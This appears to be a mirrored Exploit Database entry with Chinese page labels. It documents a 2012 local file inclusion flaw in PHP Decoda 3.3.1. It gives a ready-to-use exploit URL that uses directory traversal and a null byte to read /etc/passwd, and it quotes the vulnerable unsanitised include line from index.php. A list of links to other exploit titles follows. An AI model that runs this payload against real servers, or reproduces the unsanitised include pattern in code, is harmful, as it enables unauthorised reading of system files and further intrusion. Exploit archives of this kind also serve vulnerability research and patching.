PHP Decoda 3.3.1 – Local File Inclusion

Exploit Database
72 阅读

作者： Number 7

日期： 2012-06-16
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/19179/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Exploit Title: [php-decoda local file inclusion ]
# Date: [16/06/2012]
# Author: [Number 7]
# Software Link: [http://milesj.me/code/php/decoda]
# Version: [3.3.1]
# Tested on: [linux]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exp: 
http://localhost/milesj-php-decoda/index.php?view=../../../../../../../etc/passwd%00
 
~~Line 111 in Index.php:
	<?php	include $view .'.php'; ?>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Blogpot: [http://TunisianSeven.blogspot.com/]
Twitter: [@TunisianSeven]

last Exploits
PHP Decoda 3.3.1 – Local File Inclusion的更多信息

slickMsg – Cross-Site Scripting / HTML Injection：
Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution：
XML-RPC Library 1.3.0 – ‘xmlrpc.php’ Arbitrary Code Execution (Metasploit)：
CMS snews – SQL Injection：
Cacti 1.2.8 – Authenticated Remote Code Execution：
ServerZilla 1.0 – ’email’ SQL Injection：
Polycom RealPresence Resource Manager < 8.4 - Multiple Vulnerabilities：
Paliz Portal – Cross-Site Scripting / Multiple SQL Injections：